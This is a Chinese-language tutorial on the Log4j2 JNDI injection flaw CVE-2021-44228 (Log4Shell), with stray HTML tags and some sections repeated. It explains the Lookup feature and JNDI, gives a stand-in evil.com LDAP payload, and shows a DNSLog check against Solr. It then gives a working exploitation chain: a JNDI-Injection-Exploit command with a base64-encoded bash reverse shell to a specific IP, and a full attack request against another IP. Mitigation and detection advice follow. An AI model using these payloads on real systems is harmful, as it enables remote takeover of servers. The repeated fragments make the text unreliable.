Log4j2 JNDI 注入漏洞(CVE-2021-44228) 深入解析与利用指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2021-44228 是 Apache Log4j2 中一个严重的远程代码执行漏洞，影响版本为 2.0 到 2.14.1。该漏洞源于 Log4j2 支持的 JNDI Lookup 功能，攻击者可通过构造恶意日志触发 JNDI 远程资源加载，导致任意代码执行。<\/p>

2. 核心概念解析<\/h2>

2.1 Lookup 功能<\/h3>

定义<\/strong>：Lookup 是 Log4j2 提供的动态变量解析接口，允许在日志模板中嵌入环境变量、系统参数等动态内容。<\/p>

语法<\/strong>：<\/p>

格式：${prefix:key}<\/code><\/li>
常见用法： ${java:os}<\/code>：获取操作系统信息<\/li> ${env:VAR}<\/code>：获取环境变量<\/li> ${sys:VAR}<\/code>：获取系统属性<\/li> ${jndi:...}<\/code>：通过 JNDI 查找资源<\/li> <\/ul> <\/li> <\/ul> 2.2 JNDI (Java Naming and Directory Interface)<\/h3> JNDI 是 Java 提供的一种 API，用于访问和操作命名和目录服务。它允许 Java 应用程序通过统一的接口访问不同的命名和目录服务，如：<\/p> LDAP<\/li> DNS<\/li> RMI<\/li> <\/ul> 3. 漏洞利用原理<\/h2> 攻击者可以通过控制日志内容，传入类似 ${jndi:ldap:\/\/evil.com\/example}<\/code> 的 lookup 表达式进行 JNDI 注入，导致远程代码执行。<\/p> 4. 漏洞验证方法<\/h2> 4.1 使用 DNSLog 验证<\/h3> GET<\/span> \/solr\/admin\/cores?action=${jndi:ldap:\/\/${sys:java.version}.example.com} HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> xxxxxx:8983<\/span> <\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span> <\/span><\/span>Accept:<\/span> *\/*<\/span> <\/span><\/span>Accept-Language:<\/span> en<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36<\/span> <\/span><\/span>Connection:<\/span> close<\/span> <\/span><\/span><\/code><\/pre>可替换的变量：<\/p> ${hostName}<\/code><\/li> ${sys:user.dir}<\/code><\/li> ${sys:java.version}<\/code><\/li> ${java:os}<\/code><\/li> <\/ul> 4.2 使用 JNDI-Injection-Exploit 工具<\/h3> 下载工具：JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar<\/li> 执行命令： java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [<\/span>-C]<\/span> [<\/span>command]<\/span> [<\/span>-A]<\/span> [<\/span>address]<\/span> <\/span><\/span><\/code><\/pre><\/li> 构造反弹 shell（使用 base64 编码）： java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODkuMS4yMjYuMTE2Lzg5ODkgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span> -A 189.1.226.116 <\/span><\/span><\/code><\/pre><\/li> 选择合适的 target 构造攻击请求： GET<\/span> \/solr\/admin\/cores?action=${jndi:ldap:\/\/189.1.226.116:1389\/b48lwl} HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 101.133.238.18:8983<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0<\/span> <\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span> <\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<\/span> <\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span> <\/span><\/span>DNT:<\/span> 1<\/span> <\/span><\/span>Sec-GPC:<\/span> 1<\/span> <\/span><\/span>Connection:<\/span> keep-alive<\/span> <\/span><\/span>Cookie:<\/span> JSESSIONID=3B6F4088813DE4986AC7564771D6388E<\/span> <\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 注意<\/strong>：利用过程可能有延迟，需要等待一段时间才能收到反弹 shell。<\/p> 5. 漏洞修复方案<\/h2> 升级 Log4j2<\/strong>：<\/p> 升级到 2.15.0 或更高版本<\/li> 2.15.0 版本默认禁用了 JNDI 功能<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>：<\/p> 设置系统属性 log4j2.formatMsgNoLookups=true<\/code><\/li> 修改 JVM 参数：-Dlog4j2.formatMsgNoLookups=true<\/code><\/li> 移除 org.apache.logging.log4j.core.lookup.JndiLookup<\/code> 类<\/li> <\/ul> <\/li> 环境变量设置<\/strong>：<\/p> export LOG4J_FORMAT_MSG_NO_LOOKUPS=<\/span>true <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 漏洞影响范围<\/h2> 受影响版本<\/strong>：Apache Log4j2 2.0-beta9 至 2.14.1<\/li> 受影响组件<\/strong>：任何使用受影响版本 Log4j2 的 Java 应用程序<\/li> 攻击场景<\/strong>：攻击者只需能够控制日志内容（如通过 HTTP 请求头、表单参数等）<\/li> <\/ul> 7. 防御建议<\/h2> 输入验证<\/strong>：对所有用户输入进行严格验证和过滤<\/li> 日志监控<\/strong>：监控日志中可疑的 JNDI lookup 模式<\/li> 最小权限原则<\/strong>：限制应用程序运行权限<\/li> 网络隔离<\/strong>：限制出站网络连接，特别是 LDAP、RMI 等协议<\/li> WAF 规则<\/strong>：部署 Web 应用防火墙规则拦截包含 ${jndi:<\/code> 的请求<\/li> <\/ol> 8. 漏洞检测工具<\/h2> Log4j2 漏洞扫描器<\/strong>：<\/p> log4j-scan<\/li> log4j-detector<\/li> log4j2-rce-poc<\/li> <\/ul> <\/li> 手动检测方法<\/strong>：<\/p> grep -r "log4j"<\/span> \/path\/to\/application | grep -i "core"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 9. 总结<\/h2> CVE-2021-44228 是一个影响广泛的严重漏洞，利用门槛低但危害大。理解其原理和利用方式对于安全防护至关重要。建议所有使用 Log4j2 的组织立即采取修复措施，并持续监控相关组件的安全更新。<\/p>

Log4j2 JNDI 注入漏洞(CVE-2021-44228) 深入解析与利用指南<\/h1>

1. 漏洞概述<\/h2> CVE-2021-44228 是 Apache Log4j2 中一个严重的远程代码执行漏洞，影响版本为 2.0 到 2.14.1。该漏洞源于 Log4j2 支持的 JNDI Lookup 功能，攻击者可通过构造恶意日志触发 JNDI 远程资源加载，导致任意代码执行。<\/p>

2. 核心概念解析<\/h2>

3. 漏洞利用原理<\/h2> 攻击者可以通过控制日志内容，传入类似 ${jndi:ldap:\/\/evil.com\/example}<\/code> 的 lookup 表达式进行 JNDI 注入，导致远程代码执行。<\/p>

9. 总结<\/h2> CVE-2021-44228 是一个影响广泛的严重漏洞，利用门槛低但危害大。理解其原理和利用方式对于安全防护至关重要。建议所有使用 Log4j2 的组织立即采取修复措施，并持续监控相关组件的安全更新。<\/p>

1. 漏洞概述<\/h2>
CVE-2021-44228 是 Apache Log4j2 中一个严重的远程代码执行漏洞，影响版本为 2.0 到 2.14.1。该漏洞源于 Log4j2 支持的 JNDI Lookup 功能，攻击者可通过构造恶意日志触发 JNDI 远程资源加载，导致任意代码执行。<\/p>

3. 漏洞利用原理<\/h2>
攻击者可以通过控制日志内容，传入类似 `${jndi:ldap:\/\/evil.com\/example}<\/code> 的 lookup 表达式进行 JNDI 注入，导致远程代码执行。<\/p>`

9. 总结<\/h2>
CVE-2021-44228 是一个影响广泛的严重漏洞，利用门槛低但危害大。理解其原理和利用方式对于安全防护至关重要。建议所有使用 Log4j2 的组织立即采取修复措施，并持续监控相关组件的安全更新。<\/p>